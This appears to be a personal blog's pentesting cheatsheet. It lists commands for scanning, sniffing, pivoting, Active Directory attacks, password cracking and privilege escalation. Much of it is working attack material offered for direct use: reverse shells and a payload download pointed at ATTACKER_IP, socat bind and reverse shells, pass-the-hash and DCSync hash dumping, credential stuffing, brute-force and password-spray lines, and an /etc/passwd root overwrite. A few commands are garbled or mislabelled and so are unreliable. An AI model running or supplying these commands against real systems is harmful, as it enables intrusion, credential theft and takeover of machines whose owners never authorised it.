d3xitfl0w@web: ~$ |

d3xitfl0w / ... / Pentesting Commands

Created Sat, 23 May 2026 22:32:06 +0000 Modified Thu, 04 Jun 2026 12:50:33 +0000
3446 Words
Linux Commands Pentesting Cheatsheet Kali API Ethical Hacking

A handy collection of common pentesting commands used during recon, enumeration, scanning, exploitation, and more. Great for quick reference during labs, CTFs, or real-world assessments.

Pentesting Commands

Reconnaissance

nmap

By default, Nmap uses the following during host discovery:

  • TCP SYN packet to port 443
  • TCP ACK packet to port 80
  • ICMP type 8 (echo request)
  • ICMP type 13 (timestamp request)
  • ARP requests to obtain MAC address details

If a firewall is blocking the default ICMP pings you can adjust the flags and try the following:

  • TCP ACK Ping -PA <portlist> - set the acknowledgement (ACK) flag in the TCP header.
  • UDP Ping -PU <portlist> - use User Datagram Protocol (UDP).
  • SCTP Initiation Ping -sY <portlist> - the Stream Control Transmission Protocol (SCTP), an alternative to using either a TCP or UDP scan to see if a host is alive.
  • TCP SYN Ping -PS <portlist> - send a TCP SYN to whatever port(s) you specify. If you don’t indicate a port number, Nmap will try all ports and then display the findings.
Port State Description
OPEN The port is open and responding to probes.
CLOSED The port is not responding to probes.
FILTERED The port is blocked by a firewall.
UNFILTERED The port is accessible; however, Nmap is unable to determine if the port is open or closed. 
# Default Scans
nmap -sC -sV 172.21.0.0
nmap -Pn -sC -sV -p- 172.21.0.0
nmap -sV -Pn 172.21.0.0
nmap -T4 -sC -sV 172.21.0.0
nmap -vv -Pn -A -sC -sS -T 4 -p- 172.21.10.0/24 -oA fullscan

# Stealth Scans: 
nmap -sS -sC -sV 172.21.0.0
nmap -sS -p- 172.21.0.0

# UDP Scan: 
nmap -sS -sU -Pn -sV 172.21.0.0
nmap -sU -A --top-ports=20 --version-all
nmap -sU -A -p 53,67,68,161,162 --version-all

# Aggressive Scans: 
# Once you have obtain results from your initial # scan, run an aggressive scan in the background # to obtain more information from the initial scan you executed: 
nmap -oA fullscan-aggressive.txt -T4 -vvv --max-rtt-timeout 300ms --max-retries 3 --host-timeout 30m --max-scan-delay 500ms -Pn -p- --version-intensity 1 -iL fullscan.txt

Use --max-rtt-timeout and --max-scan-delay for scans that have problems to be completed or they skipp hosts too fast.

Additionally, for a slower, more complete, stealthier approach, the following can be used:

nmap -sT -Pn -p- --max-parallelism 1 --max-retries 0 --max-rtt-timeout 1000ms --max-hostgroup 1 -oX nmap_<IP/HOST_NAME>-all_ports_slow.xml -iL <IP/HOST_NAME>_Active_IPs.txt

# T0 and T1 - best for IDS evasion but are extremely SLOW.
# T2 - slows the scan to conserve bandwidth.
# T3 - the default and is the most stable option.
# T4 - the recommended choice for a fast scan that is still relatively stable.
# T5 - the fastest option but can be unstable and should only be used on a network that can handle the speed.

# nmap banner grabbing
nmap -sV <target_IP> -p <port number> 
nmap -sV --script=banner <target_IP>:

# gather MAC addresses using ARP ping with ping scan disabled.
nmap -PR -sn <target>

# Use nmap to discover web servers on the network and pipe the output to Nikto.
nmap -p80,443 10.0.1.0/24 -oG - | nikto.pl -h –

nmap scripts

# Location: /usr/share/nmap/scripts/

# list available scripts
ls -al /usr/share/nmap/scripts/

# dns script
nmap -–script=dns-random-srcport
# Detect CSRF vulnerabilities
nmap -sV –script http-csrf <target domain>
# Check if the "shellshock" vulnerability can be exploited in a web app
nmap -sV –script http-sherlock <target domain>
# Attempt to perform a DNS update without authentication by entering the command
nmap -sU -p 53 –script=dns-update –script-args=dns-update.hostname=foo.example.com,dns-update.ip=192.0.2.1 <target IP address>
# Check if target IP address is vulnerable to the arbitrary shared library load vulnerability
# nmap –script smb-vuln-cve-2017-7494 -p 445 <target IP address>

# Runing multiple scritps
nmap --scripts vuln,safe,discovery -oN results.txt target-ip

# Scripts categories:
https://nmap.org/nsedoc/categories/vuln.html

Vuln vs Vulners vs Vulscan NSE scripts

Description Vuln Vulners Vulscan
Included Nmap scripts Yes Yes No
Sends CPE data outside of the organization No Yes* No
Requires download of vulnerability database No, but limited CVEs No* Yes
Confidence High Depends Depends
Potentially Disruptive Yes No No
When to Use Thorough accurate scan of key vulnerabilities In depth scan, no concern for sending out CPE Data More in-depth scan and a desire not to release CPE data

*Vulners has the option to download and use a local database.

nmap NSE script - Vulscan

# Vulscan will run non-invasive tests for all applicable vulnerabilities against the target. The results will display the port followed by limited information on the specific CVEs discovered.
# Instllation:
# - Download the repo:
sudo git clone https://github.com/scipag/vulscan
# - Make a soft link to the NSE scripts directory 
sudo ln -s ${pwd}/scipag_vulscan /usr/share/Nmap/scripts/vulscan
# Command syntax
sudo Nmap -sV --script=vulscan/vulscan.nse <target IP address or host name>

# sniff the network for 60 sec using the eth0 interface, list any new targets that it sniffs, and then scan those targets
nmap --script=targets-sniffer --script-args=newtargets,targets-sniffer.timeout=60s,targets-sniffer.iface=eth0

# Scans through Socks proxy: 
nmap --proxies socks4://proxy-ip:8080 target-ip

Unicornscan

unicornscan -mU -p ,161,162,137,123,138,1434,445,135,67,68,53,139,500,637,162,69

netcat

#!/bin/bash
for i in {0..255}; do
    for j in {0..255};do
        for k in {0..65535};do
            nc -v -z -n -w 1 10.100.${i}.${j} ${k} >> nc_port_scan.txt
        done
    done
done

Naabu

Source: https://github.com/projectdiscovery/naabu

# Installing Naabu: 
# Latest: 
go install -v github.com/projectdiscovery/naabu/v2/cmd/naabu@latest
 
# In Kali Linux: 
sudo apt install naabu
 
# Using Naabu: 
naabu -host megacorpone.com
naabu -p 80,443,21-23,u:53 -host megacorpone.com
naabu -p - -exclude-ports 80,443 -host megacorpone.com
naabu -host megacorpone.com -json

rustscan

# Source: https://github.com/bee-san/RustScan

rustscan --ip 172.21.0.0 --ports 80,443,21-23 --tcp
rustscan --ip 172.21.0.0 --ports 80,443,21-23 --udp
rustscan --range 172.21.0.0-172.21.0.254 --ports 1-65535 --tcp
rustscan --range 172.21.0.0-172.21.0.254 --ports 1-65535 --tcp --exclude-ips 172.21.0.128
rustscan --subnet target-subnet --ports <port_range> --tcp
rustscan --ip host--ports post-range --tcp -t <number-of-threads>

masscan

# Scanning targets
masscan 172.21.10.0
masscan 172.21.10.0/24 172.21.0.0/16
masscan 172.21.10.0/24 --excludeFile <File>
masscan 172.21.10.0/24 --exclude 172.21.10.254

# Scanning for services: 
masscan  172.21.10.1 -p 80
masscan  172.21.10.1 -p 0-65535
masscan  172.21.10.1 -p 80,443
masscan 172.21.10.0/24 -p 0-65535 --rate 1000000 --open-only --http-user-agent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36" -oL "output.txt"

# UDP Scan
masscan 172.21.10.1 -pU 53

## Report only open ports
masscan 10.0.0.1 --open-only

# Other Options
## Offline Mode (Reviews how fast the program runs without the transmit overhead)
masscan 0.0.0.0/24 --offline

## Obtaining Service banners:
masscan 172.21.10.1 --banners

## Source IP spoofing
masscan 10.0.0.1 --source-ip 192.168.1.200

## Change the default user agent
masscan 10.0.0.1 --http-user-agent <user-agent>

## Save sent packet in PCAP
masscan 10.0.0.1 --pcap <filename>

# References:
# https://github.com/robertdavidgraham/masscan
# https://danielmiessler.com/study/masscan/

Domain Discovery

Sublis3r

Sublist3r -d www.example.com
Sublist3r -v -d www.example.com -p 80,443

Subfinder:

subfinder -d www.example.com

OWASP AMASS

amass enum -d www.example.com
amass intel -whois -d www.example.com
amass intel -active 172.21.0.0-64 -p 80,443,8080,8443
amass intel -ipv4 -whois -d www.example.com
amass intel -ipv6 -whois -d www.example.com

Sniffing

tcpdump

tcpdump -i eth0
tcpdump -c -i eth0
tcpdump -A -i eth0
tcpdump -w 0001.pcap -i eth0
tcpdump -r 0001.pcap
tcpdump -n -i eth0
tcpdump -i eth0 port 22
tcpdump -i eth0 -src 172.21.10.X
tcpdump -i eth0 -dst 172.21.10.X

tshark

# General Options:
tshark --list-interfaces
tshark -i interface
tshark -i interface -w capture.pcap
tshark -i interface -r capture.pcap # reading a pcap file
# Filtering Protocols:
tshark -i interface -Y "http || dns || tcp"
tshark -i interface -Y "http && tcp"
tshark -i interface -Y "http || dns"
# Filtering IP address:
tshark -i interface -Y "ip.src == 172.21.0.0"
# Destination: 
tshark -i interface -Y "ip.dst == 172.21.0.0"
# Either Source or Destination: 
tshark -i interface -Y "ip.addr == 172.21.0.0"
# Both Source and Destination: 
tshark -i interface -Y "(ip.src == 172.21.0.0 && ip.dst == 172.21.0.0) || (ip.src == 172.21.0.0 && ip.dst == 172.21.0.0)"
# IP Range:
tshark -i interface -Y "ip.addr == 172.21.0.0/24"
# Using Filters and IP Addresses: 
tshark -i interface -Y "ip.src == 172.21.0.0 && http"

dumpcap

dumpcap -i interface -w capture.cap

Post-Exploitation

After obtaining access: establish persistence, pivot, exfiltrate data.

File Transfer

# Quick HTTP server to transfer files
python3 -m http.server 8080

# Download file on Windows target
certutil -urlcache -split -f http://ATTACKER_IP:8080/file.exe C:\Temp\file.exe

Reverse Shells

# Bash reverse shell
bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1

# Python reverse shell
python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect(("ATTACKER_IP",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'

Shell Upgrade

# Upgrade to interactive TTY
python3 -c 'import pty;pty.spawn("/bin/bash")'

Pivoting and Tunneling

Tunnel Verification

# Check if your tunnel is active and running: 
nc -z localhost port || echo 'no tunnel open'
netstat -lpnt | grep port | grep ssh
ps aux | grep ssh
ss -ntlp

SSH Tunneling

Forward Dynamic SOCKS Proxy

The target SSH server acts as a transparent SOCKS proxy and moves the packets to the destination.

# Note: Target must have SSH running for there service.
# SOCKS operates at layer 4 and up on the OSI model. Ping -- or ICMP -- is a layer 3 protocol and does not flow over SOCKS. So, you cannot ping targets through a SOCKS proxy.

# Password authentication (on the attacker)
ssh -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" -f -N -D localhost:<LOCAL_PORT> user@target

# Key authentication (on the attacker)
ssh -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" -f -N -D localhost:<LOCAL_PORT> -i /path/to/private-key user@target

# Dynamic SOCKS Proxy with ProxyChains
# 1. On the attacker machine create SSH Tunnel: ssh -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" -f -N -D localhost:<LOCAL_PORT> user@target
# 2. Setup ProxyChains. Edit the following config file (/etc/proxychains.conf)
# 3. Add the following line into the config: Socks5 127.0.0.1 <LOCAL_PORT>
# 4. Run commands through the tunnel
proxychains <command>
sudo proxychains -q nmap -Pn -sT --top-ports 500 <target(s)>
# curl connection using SOCKS proxy
curl --proxy 'socks5://127.0.0.1:58080' http://127.0.0.1:8080

# More info: https://notes.benheater.com/books/network-pivoting/page/port-forwarding-with-ssh
Reverse Dynamic SOCKS Proxy
# Create a dummy account on Kali -> generate an SSH key pair -> transfer the private key to the target -> Run on the target (victim)
⚠️ BE CAREFUL WITH REVERSE CONNECTIONS BACK TO ATTACK BOX ⚠️
- REMOVE THE CREDENTIAL ONCE YOU HAVE ACHIEVED THE GOAL -

# Password Authentication (on the victim)
ssh -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" -f -N -R <ATTACKER_HOST>:<ATTACKER_PORT> junk_user@<ATTACKER_HOST>

# Key Authentication (on the victim)
ssh -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" -f -N -R <ATTACKER_HOST>:<ATTACKER_PORT> -i /path/to/private-key junk_user@<ATTACKER_HOST>

# curl to a target via SOCKS proxy (on the attacker)
curl --proxy 'socks5://127.0.0.1:58080' http://127.0.0.1:8080

# Dynamic Reverse SOCKS Proxy with ProxyChains
# 1. On the victim machine create SSH Tunnel:
ssh -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" -f -N -R <ATTACKER_HOST>:<ATTACKER_LOCAL_PORT> junk_user@<ATTACKER_HOST>
# 2. On the attacker machine setup ProxyChains. Edit the following config file
/etc/proxychains4.conf
# 3. Add the following line into the config: Socks5 127.0.0.1 <ATTACKER_LOCAL_PORT>
# 4. Run commands through the tunnel (on the attacker)
proxychains <command>
# TCP connect scans are very slow, use top 1000 ports
sudo proxychains -q nmap -Pn -sT --top-ports 1000 -T4 -sC -sV 127.0.0.1

# More info: https://notes.benheater.com/books/network-pivoting/page/port-forwarding-with-ssh

💡 Tips and Tricks

# On the target - generate a list of -L port forwards for convenience and ignores DNS resolver.
# Change -L to -R you want to generate the output for reverse port forwards.
ss -plutan | grep -i listen | grep -oE '(127.0.0.1|\[::1\]):[0-9]{1,5}' | grep -v 53 | sed 's/\[::1\]/127.0.0.1/g' | xargs -I {} echo '-L {}:{} \'

SShuttle

Sshuttle allows you to VPN via a SSH connection, to reach a private range, which is accessible from a public reachable server such as a bastion host or a target server.

# In Kali
# Source: https://github.com/sshuttle/sshuttle

sshuttle -r root@172.21.0.0 10.2.2.0/24
sshuttle -D -r user@host 10.10.10.10 0/0 --ssh-cmd 'ssh -i ./id_rsa' # Daemon mode
sshuttle -D --dns -vr user@yourserver.com 0/0 --ssh-cmd 'ssh -i /your/key/path.pem' # Daemon mode with DNS
# Working with your .ssh/config
sshuttle --dns -vr user@server 0/0 --ssh-cmd 'ssh jumpbox'
sshuttle --dns -r myserver 0/0 -x <server-IP>
sshuttle ... --ssh-cmd 'ssh -F configfile'

Socat

# Bind Shell
victim-> socat TCP-LISTEN:443,reuseaddr,fork EXEC:bash,pty,stderr,setsid,sigint,sane
attacker-> socat FILE:`tty`,raw,echo=0 TCP4:<VICTIM_IP>:443

# Reverse Shell
attacker-> socat TCP-LISTEN:443,reuseaddr FILE:`tty`,raw,echo=0
victim-> socat TCP4:<attackers_ip>:443 EXEC:bash,pty,stderr,setsid,sigint,sane

netcat Port Forwarder

# 1. On the pivot machine create a named pipe (FIFO) called pivot
cd /tmp && mknod pivot p
# 2. nc -l -p <PIVOT_LISTENING_PORT> 0<pivot | nc <TARGET_HOST> <TARGET_PORT> 1>pivot
# 3. On the attacker machine forward traffic from the pivot listening port to the target host:target port, for example, to the target port 4000 using ssh:
ssh user@pivot.host.example.com -p 4000

reGeorg

Source: https://github.com/sensepost/reGeorg
Note: reGeorg requires Python 2.7 and the following modules:

urllib3 - HTTP library with thread-safe connection pooling, file post, and more.

1. Upload tunnel.(aspx|ashx|jsp|php) to a webserver
2. Configure the tool to use a socks proxy, use the ip address and port you specified when you started the reGeorgSocksProxy.py

python reGeorgSocksProxy.py -p 8080 -u http://upload.target.net:8080/tunnel/tunnel.jsp

Metasploit

# Meterpreter
# Use only if you have a meterpreter shell and you need to pivot to another network.

# Portfwd
meterpreter > portfwd add -l 80 -r 172.21.0.0 -p 80

# Autoroute
# In Metasploit
1. use post/multi/manage/autoroute

msf5 post(multi/manage/autoroute) > options

Module options (post/multi/manage/autoroute):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   CMD      autoadd          yes       Specify the autoroute command (Accepted:                                         add, autoadd, print, delete, default)
   NETMASK  255.255.255.0    no        Netmask (IPv4 as "255.255.255.0" or CIDR                                         as "/24"
   SESSION                   yes       The session to run this module on.
   SUBNET                    no        Subnet (IPv4, for example, 10.10.10.0)

msf5 post(multi/manage/autoroute) > 

2. set session "avaliable session"
3. run

# Metasploit Socks Proxy

   1  auxiliary/server/socks4a                                  normal  No     Socks4a Proxy Server
   2  auxiliary/server/socks5                                   normal  No     Socks5 Proxy Server
   3  auxiliary/server/socks_unc                                normal  No     SOCKS Proxy UNC Path Redirection

Cntlm

apt install cntlm

1. cntlm -u username@breakme.local -I proxy
2. export http://127.0.0.1:3128, export https://127.0.0.1:3128
3. Accessing with browser: chromium --proxy-server="http://127.0.0.1:3128"

More tools:

Resources to learn more about pivoting and tunneling:

Enumeration

AD Enumeration

bloodhound

# Collect BloodHound data remotely
bloodhound-python -c All -d DOMAIN.LOCAL -u USER -p PASS -ns DC_IP

# LDAP user enumeration
ldapsearch -x -H ldap://DC_IP -D "USER@DOMAIN" -w PASS -b "DC=domain,DC=local" "(objectClass=user)" sAMAccountName

Password Authentication

# List any service principals associated with the user
impacket-GetUserSPNs -dc-ip domain-controller-ip 'domain.tld/username:password'

# Request a TGS
impacket-GetUserSPNs -dc-ip domain-controller-ip 'domain.tld/username:password' -request

# Post-compromise via a proxy host
proxychains -q impacket-GetUserSPNs -dc-ip domain-controller-ip 'domain.tld/username:password'
proxychains -q impacket-GetUserSPNs -dc-ip domain-controller-ip 'domain.tld/username:password' -request

Pass-the-Hash

# List any service principals associated with the user
impacket-GetUserSPNs -dc-ip domain-controller-ip -hashes lm-hash:nt-hash 'domain.tld/username'

# Request a TGS
impacket-GetUserSPNs -dc-ip domain-controller-ip -hashes lm-hash:nt-hash 'domain.tld/username' -request

# Get shell using NTLM hash (no password needed)
impacket-psexec DOMAIN/USER@TARGET_IP -hashes :NTLM_HASH

# Post-compromise via a proxy host
proxychains -q impacket-GetUserSPNs -dc-ip domain-controller-ip -hashes lm-hash:nt-hash 'domain.tld/username'
proxychains -q impacket-GetUserSPNs -dc-ip domain-controller-ip -hashes lm-hash:nt-hash 'domain.tld/username' -request

ASREPRoast

impacket-GetUserSPNs <domain_name>/<domain_user>:<domain_user_password> -request -format <AS_REP_responses_format [hashcat | john]> -outputfile <output_AS_REP_responses_file>
impacket-GetUserSPNs <domain_name>/ -usersfile <users_file> -format <AS_REP_responses_format [hashcat | john]> -outputfile <output_AS_REP_responses_file>

Kerberoasting

# Check for Kerberoasting
GetNPUsers.py DOMAIN-Target/ -usersfile user.txt -dc-ip <DOMAIN-CONTROLLER-IP> -format <hashcat | john>

# Authenticate with valid credentials, enumerates accounts in the domain that have Service Principal Names (SPNs) and request TGS tickets.
impacket-GetUserSPNs <domain_name>/<domain_user>:<domain_user_password> -outputfile <output_TGSs_file> 

# Overpass The Hash/Pass The Key (PTK):
python3 getTGT.py <domain_name>/<user_name> -hashes [lm_hash]:<ntlm_hash>
python3 getTGT.py <domain_name>/<user_name> -aesKey <aes_key>
python3 getTGT.py <domain_name>/<user_name>:[password]

# Using TGT key to excute remote commands from the following impacket scripts:
python3 psexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
python3 smbexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
python3 wmiexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass

DCSync

# Dump all domain NTLM hashes via DCSync
impacket-secretsdump DOMAIN/USER:PASS@DC_IP -just-dc-ntlm

Netexec

NetExec (a.k.a nxc) is a network service exploitation tool that helps automate assessing the security of large networks.

# Kali instllation: apt install netexec

Fuzzing

💡 Tips : Fuzz non-printable characters in any user input Could result in regex bypass, account takeover… 0x00, 0x2F, 0x3A, 0x40, 0x5B, 0x60, 0x7B, 0xFF %00, %2F, %3A, %40, %5B, %60, %7B, %FF

Fuzzing Wordlists

ffuf

# Enumerate URLs
ffuf -u http://localhost:3000/FUZZ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/big.txt


# Enumerate Files
ffuf -u http://localhost:3000/FUZZ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/raft-medium-words-lowercase.txt -e .php,.html,.txt

# Subdomain Enumeration
ffuf -u http://FUZZ.mydomain.com -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt

# Find Usernames
# The -mr flag is used to match a regular expression. You can have complicated regular expressions or a simple string message to validate the requests.
ffuf -w /usr/share/SecLists/Usernames/top-usernames-shortlist.txt -X POST -d "username=FUZZ&&password=x" -H "Content-Type: application/x-www-form-urlencoded" -u http://mydomain.com/login -mr "username already exists"

# Username / pwd Brute Forcing
# The default placeholder FUZZ replaced by variables e.g. W1 for username and W2 for the password wordlist.
# Any valid combinations found, you will see in the results. For noise reduction filter by status codes (e.g. 400 or 200) using the -fc or -mc flags.
ffuf -w usernames.txt:W1,/usr/share/wordlists/SecLists/Passwords/Common-Credentials/10-million-password-list-top-100.txt:W2 -X POST -d "username=W1&password=W2" -H "Content-Type: application/x-www-form-urlencoded" -u http://localhost:3000/login -fc 200

API Fuzzing

# Path Fuzzing (Basic)
ffuf -u https://api.target.com/FUZZ -w api-endpoints.txt -mc 200,201,401,403,405 -t 50 -rate 100

# Patth Fuzzing (Extended)
# Notice 400 might cause many false positives.
ffuf -u https://api.target.com/FUZZ -w api-endpoints.txt -mc 200,201,401,403,405,400,302 -t 50 -rate 100

# Exclude 404 status code and save results to a file
ffuf -u https://api.target.com/FUZZ - w wordlist.txt -fc 404 -o results.json -of json

# API Version Enumeration
# api-versions (comma-separated values) in the file might look like:
# 0, v0, v1, v2, v3, ...
# dev, legacy, old, deprecated, api, api1 ...
ffuf -u https://api.target.com/FUZZ/users -w versions.txt -fc 404

# Enumerate through api version and path
ffuf -u https://api.target.com/FUZZ1/FUZZ2 -w api-versions.txt:FUZZ1 -w api-endpoints.txt:FUZZ2 -fc 404

# HTTP Method Fuzzing
# Use OPTIONS/HEAD to discover supported methods before heavy fuzzing. Be careful with DELETE!
# Example http-method.txt: GET, POST , PUT, PATCH, DELETE, HEAD, OPTIONS, TRACE, CONNECT
ffuf -u https://api.target.com/api/users1 -X FUZZ -w http-methods.txt -fc 404,405

# Endpoint Fuzzing with DELETE method (use with caution!)
ffuf -u https://api.target.com/FUZZ -w api-endpoints.txt -X DELETE -mc 200,202,204,401,403,404,405

# 200 OK - resource deleted (often returns info).
# 202 Accepted - deletion queued/asynchronous.
# 204 No Content - deleted, no body returned.
# 401/403 - authentication/authorization required or forbidden.
# 404 - resource not found.
# 405 - DELETE not allowed on that endpoint.

# Credential Stuffing Attack
ffuf -w emails.txt:FUZZ1 -w passwords.txt:FUZZ2 -X  POST -d '{"email":"FUZZ1","password":"FUZZ2"}' -H "Content-Type:  application/json" -u http://<TARGET>/example/api/endpoint/user/login -mc 200  -mode pitchfork -s

💡 Tips and Tricks

f you have credential files e.g. creds.csv with usernames and passwords, you can split the file into two separate wordlists (emails and passwords):

# Extracting the emails
cut -d "," -f 1 creds.csv > emails.txt
 
# Extracting the passwords
cut -d "," -f 2 creds.csv > passwords.txt

Password Attacks

Hash Cracking

hashcat

hashcat -m 1000 hashes.txt /usr/share/wordlists/rockyou.txt --rules-file /usr/share/hashcat/rules/best64.rule
Crack NTLM hashes with rules

John (John the Ripper)

# Basic hashes cracking 
john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt

Online Brute-force

hydra

hydra -l admin -P /usr/share/wordlists/rockyou.txt TARGET_IP ssh -t 4
SSH brute-force (4 threads to avoid lockout)

Password Spraying

crackmapexec

crackmapexec smb TARGET_IP -u users.txt -p 'Season2026!' --continue-on-success
SMB password spray across user list

Privilege Escalation - Linux

SUID, SGID, StickyBit

Locate applications you can run as root.

# Find files that have both SUID and SGID set 
$ find . -perm -6000

# Find files with SUID, SGID and StickyBit set
$ sudo find / -perm +7000 -type f

# Find directories with SUID, SGID and StickyBit 
$ sudo find / -perm +7000 -type d

# Find stickyBit
find / -perm -u=s -type f 2>/dev/null

# Privilege  escalation with SUID 
https://www.hackingarticles.in/linux-for-pentester-cp-privilege-escalation/

Capabilities

# List files with Linux capabilities
getcap -r / 2>/dev/null

Cron Jobs

# All scheduled cron jobs
cat /etc/crontab && ls -la /etc/cron.* && crontab -l

Sudo Misconfigurations

# List commands the current user can run as sudo
sudo -l

Passwd Overwrite (with Generated Hashes)

/etc/passwd, /etc/shadow - obtain a copy of these files to crack root or privileged user passwords.

# 1. Genrate a salted hash 
# Salted MD5
openssl passwd -1 -salt examplesaltvalue123 <YOUR_PASSWORD>
$1$examplesaltvalue123$VNaIxa122.c5XjpQCjM4a.

# or  
SALT=$(openssl rand -base64 6) # here 6 bytes of random data to generate. 
# Salted MD5
openssl passwd -1 -salt $SALT <YOUR_PASSWORD>
# Salted SHA-256
openssl passwd -5 -salt $SALT <YOUR_PASSWORD>
# Salted SHA-512
openssl passwd -6 -salt $SALT <YOUR_PASSWORD>

# 2. Paste the hash into a writable passwd file
# Example:
# cp /etc/passwd to home directory,
# change the file to add new user (or change exsiting) but with root privileges. 
# Finally replace the file with cp (due to wrong cp permissions).
  /etc/passwd (original):
  root:x:0:0:root:/root:/bin/bash
  /etc/passwd (changed)
  root<YOUR_PWD_HASH>:0:0:root:/root:/bin/bash

# https://notes.benheater.com/books/linux/page/alternate-information-gathering-methods

Privilege Escalation - Windows

Escalate from low-priv user to SYSTEM. Token impersonation, service abuse, unquoted paths.

WinPEAS

## WinPEAS - automated Windows privesc enumeration
winPEASany.exe quiet fast searchfast

whoami

# Check current privileges - look for SeImpersonate, SeBackup
whoami /priv

Token Impersonation

# Exploit SeImpersonatePrivilege (Windows Server 2019+)
.\GodPotato.exe -cmd "cmd /c whoami"

Unquoted Service Paths

# Find services with unquoted paths outside system directories
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows"

Useful Resources

https://pentestmindmap.com/cheatsheet

⚠️ Disclaimer: The content on this site is for educational purposes only and should be used responsibly in authorized environments. Unauthorized actions may be illegal. Read the full disclaimer .